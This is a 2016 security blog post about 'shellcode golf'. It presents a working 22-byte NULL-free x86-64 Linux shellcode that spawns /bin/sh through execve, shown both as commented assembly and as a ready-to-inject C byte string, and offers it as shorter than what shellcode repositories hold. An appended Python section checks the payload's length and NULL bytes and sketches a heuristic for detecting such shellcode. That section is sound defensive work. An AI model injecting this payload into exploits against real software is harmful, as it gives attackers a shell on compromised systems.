27 Apr 2016 inSecurity
So about two years ago, I put together the [shortest x86-64 shellcode for ] that I could. At the time, it was 25 bytes, which I thought was pretty damn good. However, I’m a perfectionist and so I spent some time before work this morning playing shellcode golf. The rules of my shellcode golf are pretty simple:
- The shellcode must produce the desired effect.
- It doesn’t have to do things cleanly (i.e., segfaulting afterwards is OK, as is using APIs in unusual ways, so long as it works).
- It can assume the stack pointer is at a place where it will not segfault and it will not overwrite the shellcode itself.
- No NULLs. While there might be other constraints, this one is too common to not have as a default.
So, spending a little bit of time on this, I came up with the following 22 byte shellcode:
```nasm
BITS 64
xor esi, esi                  ; esi = 0 (argv = NULL); zero-extends to rsi
push rsi                      ; NUL terminator for the string below
mov rbx, 0x68732f2f6e69622f   ; "/bin//sh" in little-endian
push rbx                      ; string now sits at [rsp]
push rsp
pop rdi                       ; rdi = pointer to "/bin//sh" (filename)
imul esi                      ; edx:eax = eax * 0, so rdx = 0 (envp = NULL), rax = 0
mov al, 0x3b                  ; SYS_execve
syscall
```
Assembled, we get:
```c
char shellcode[] = "\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05";
```
This is shorter than anything I could find on shell-storm or other shellcode repositories. If you know of something shorter or think you can do better, let me know!
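As an added example (not code from the original post), here is a small Python checker for the golf rules above: it decodes the C escape string, verifies the no-NULL rule and the byte count, recovers the `mov rbx, imm64` string to confirm it spells the intended path, and, from the defender's side, shows a simple heuristic for spotting this execve pattern in a byte buffer. `SHELLCODE_C` is the 22-byte string from this post; the helper names are my own.

```python
import re

# The 22-byte sequence from the post, as it appears in the C string literal.
SHELLCODE_C = (r"\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68"
               r"\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05")


def decode_c_escapes(s: str) -> bytes:
    """Turn the body of a C "\\xNN..." string literal into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9A-Fa-f]{2})", s))


def check_golf_rules(code: bytes) -> dict:
    """The two mechanical rules from the post: no NULL bytes, and the length."""
    return {"length": len(code), "has_null": b"\x00" in code}


def find_movabs_imm64(code: bytes):
    """Return the 8-byte immediate of the first `mov r64, imm64` (REX.W + B8..BF).

    0x48..0x4F with the W bit set is the REX prefix; opcode B8+rd is mov r64, imm64.
    The immediate is stored little-endian, so its bytes read as the ASCII string
    the author packed into 0x68732f2f6e69622f ("/bin//sh").
    """
    for i in range(len(code) - 9):
        if (code[i] & 0xF8) == 0x48 and 0xB8 <= code[i + 1] <= 0xBF:
            return code[i + 2:i + 10]
    return None


def looks_like_execve_shellcode(code: bytes) -> bool:
    """Defender-side heuristic: an imm64 that spells an absolute path, followed later
    by `mov al, 0x3b` (B0 3B, the execve syscall number) and `syscall` (0F 05)."""
    imm = find_movabs_imm64(code)
    if imm is None or not imm.startswith(b"/"):
        return False
    tail = code[code.find(imm) + 8:]
    return b"\xb0\x3b" in tail and b"\x0f\x05" in tail


if __name__ == "__main__":
    code = decode_c_escapes(SHELLCODE_C)
    print(check_golf_rules(code))            # {'length': 22, 'has_null': False}
    print(find_movabs_imm64(code))           # b'/bin//sh'
    print(looks_like_execve_shellcode(code)) # True
```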